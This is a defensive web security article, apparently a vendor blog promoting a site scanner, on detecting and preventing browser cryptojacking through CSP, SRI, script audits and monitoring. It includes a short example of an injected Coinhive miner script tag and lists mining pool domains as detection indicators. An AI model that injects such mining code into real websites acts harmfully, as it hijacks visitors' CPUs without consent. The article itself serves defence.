Cryptojacking Detection and Prevention: Stop Drive-By Mining on Your Website

Cryptojacking Detection and Prevention: Stop Drive-By Mining on Your Website

Cryptojacking is the unauthorized use of someone else's computing resources to mine cryptocurrency. On the web, this means your website's visitors unknowingly donate their CPU cycles to an attacker — their browser tab runs JavaScript that solves cryptographic puzzles, generating cryptocurrency deposited into the attacker's wallet while degrading your users' experience and battery life.

Is your site exposed? Run a free ZeriFlow scan →

What Is Cryptojacking?

The term combines "cryptocurrency" and "hijacking." Unlike ransomware or data theft, cryptojacking doesn't immediately destroy data or steal identifiable information — it silently consumes resources. This makes it particularly insidious: many victims don't notice for weeks or months.

At its peak in 2017–2018, Coinhive — a legitimate-turned-abused JavaScript Monero mining library — was found on tens of thousands of websites, including government sites, The Pirate Bay, and several newspaper websites. A single injected script tag was enough to start mining across every visitor's browser session.

How Drive-By Cryptomining Works

Injected Scripts on Compromised Websites

The most common web cryptojacking attack: an attacker compromises a website (via XSS, a CMS plugin vulnerability, a web shell, or a supply chain attack against a third-party script) and injects a cryptomining JavaScript library.

Every visitor to the site runs the miner in their browser. The script uses WebAssembly for near-native performance, typically consuming 80–100% of one CPU core. Sophisticated implementations throttle CPU usage to avoid detection and reduce user complaints.

Example injected script:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY');
  miner.start();
</script>

Third-Party Script Compromise

A website may unknowingly serve cryptomining code through a compromised analytics provider, A/B testing tool, or advertising network. The website owner has a clean codebase — but a third-party script they load was modified by an attacker. This is a supply chain attack with cryptojacking as the payload.

Malvertising

Attackers purchase advertising slots on ad networks and serve ads containing mining scripts. Even major, reputable websites have been hit this way — the site itself is clean, but the ad iframe runs the miner.

Server-Side Cryptomining

Cryptojacking also affects web servers directly: attackers with server access (via web shells, compromised credentials, or misconfigurations) install mining software like XMRig directly on the server, consuming server CPU for 24/7 mining. This is distinct from browser-based cryptojacking but equally damaging.

How to Detect Cryptojacking on Your Website

CPU Usage Monitoring for Visitors

The most visible symptom is abnormal CPU usage when visiting a page — fan noise increases, browser becomes sluggish, battery drains faster. As a website owner, test your own pages:

1. 1Open Chrome DevTools → Performance tab
2. 2Load your page and watch CPU utilization
3. 3Cryptomining typically shows sustained high CPU in JavaScript execution, often in a Web Worker

Code Review and Script Auditing

Regularly audit all <script> tags in your HTML — both inline scripts and external sources. Look for: - Unknown script domains you didn't intentionally include - Scripts loaded from CDNs that aren't in your approved list - Inline scripts containing obfuscated code or WebAssembly.instantiate calls

Server-Side File Scanning

Use LMD, ClamAV, or rkhunter to scan for known cryptominer binaries on your server. Monitor for new cron jobs, new processes consuming high CPU, and unexplained network connections to mining pool addresses (common pools: pool.supportxmr.com, mine.xmrpool.net, moneroocean.stream).

Browser Extensions for Detection

Extensions like No Coin and minerBlock maintain blocklists of known mining script domains and can be used during auditing to confirm whether a site serves mining code.

Content Security Policy: The Primary Defense

Content Security Policy (CSP) is the most effective browser-level defense against cryptojacking. A properly configured CSP prevents unauthorized scripts from executing at all.

The key directive is script-src:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-analytics.com

With this policy: - Inline scripts are blocked by default (unless you use 'unsafe-inline' — avoid this) - Scripts from any domain not listed in script-src are blocked - Injected mining scripts loading from external domains cannot execute - Web Workers (which cryptominers use to avoid blocking the main thread) are covered by worker-src — set this to 'self' as well

Blocking WebAssembly is an additional hardening step: 'wasm-unsafe-eval' controls WebAssembly execution. Some browsers require explicit allowance for WASM. By not including it, you prevent WASM-based miners even if JavaScript restrictions are bypassed.

ZeriFlow's scan checks whether your site has a Content Security Policy deployed and evaluates its script-src configuration for overly permissive directives.

Check your CSP configuration with ZeriFlow →

Additional Detection and Prevention Measures

Subresource Integrity (SRI) for External Scripts

As covered in supply chain security: add SRI hashes to all external scripts. If a third-party script is modified to include a miner, the hash mismatch prevents it from executing.

Web Application Firewall Rules

WAF rules can block requests to known mining pool domains and IP addresses. Cloud WAF providers (Cloudflare, AWS WAF) offer managed blocklists that include mining infrastructure.

DNS-Level Blocking

Network-level blocking of known mining pool domains prevents browser-based and server-side miners from reaching their pools. Tools like Pi-hole or enterprise DNS security products maintain regularly updated blocklists.

Continuous Monitoring with Script Change Detection

Implement monitoring that alerts on changes to your website's HTML or loaded scripts. Tools like Detectify, NightWatch, or custom scripts using diff against a known-good snapshot can catch injected code within minutes.

Content Security Policy Reporting

Add a report-uri or report-to directive to your CSP to receive violation reports when blocked scripts attempt to execute:

Content-Security-Policy: script-src 'self'; report-uri https://csp.yoursite.com/report

This gives you real-time visibility into attempted script injections, including cryptomining scripts.

Removing Cryptomining Code

If you discover cryptojacking on your site:

1. 1Identify the source — is it in your own code, a plugin, or a third-party script? Check all script inclusions and compare against your last known-good deployment.
2. 2Remove the malicious code — delete the injected script tags or update the compromised dependency.
3. 3Find and close the entry point — a web shell, plugin vulnerability, or compromised supply chain dependency.
4. 4Audit for additional malware — cryptomining is often one of several payloads installed after a compromise.
5. 5Rotate credentials — server passwords, hosting panel credentials, CMS admin accounts.
6. 6Deploy CSP — if you weren't running one before, now is the time.

FAQ

Q: Can cryptojacking harm my website visitors' hardware?

A: Sustained high CPU load generates heat. On laptops with poor thermal management, prolonged cryptomining could theoretically accelerate component wear. More practically, it drains battery quickly and degrades performance — users notice, get frustrated, and leave.

Q: Does blocking JavaScript entirely prevent cryptojacking?

A: Yes, but it breaks almost every modern website. The practical solution is CSP with a specific script-src allowlist, which blocks unauthorized scripts while permitting your legitimate JavaScript.

Q: Can cryptojacking happen on static sites?

A: Yes. If your static site loads any third-party scripts (analytics, fonts, ads, chat widgets), those scripts can be compromised and inject miners. SRI hashes and a restrictive CSP script-src apply equally to static sites.

Q: Is cryptojacking illegal?

A: In most jurisdictions, running mining code on visitors' browsers without explicit consent is unauthorized access to a computer system and therefore illegal. For website owners who unknowingly serve mining scripts due to a compromise, liability is generally not pursued, but the reputational damage is real.

Q: What does ZeriFlow specifically check for cryptojacking prevention?

A: ZeriFlow checks your Content-Security-Policy header, including the script-src directive that is the primary defense against injected mining scripts. It flags sites with missing CSP, overly permissive 'unsafe-inline' directives, or absent script-src restrictions.

Conclusion

Cryptojacking abuses visitor trust and computing resources, often operating invisibly for months. The defenses are clear: a restrictive Content Security Policy with a tight script-src allowlist, SRI hashes on external scripts, regular code audits, and monitoring for unauthorized script changes. Deploying a CSP is a one-time configuration change that eliminates the entire browser-based cryptomining vector.

Scan your site free on ZeriFlow →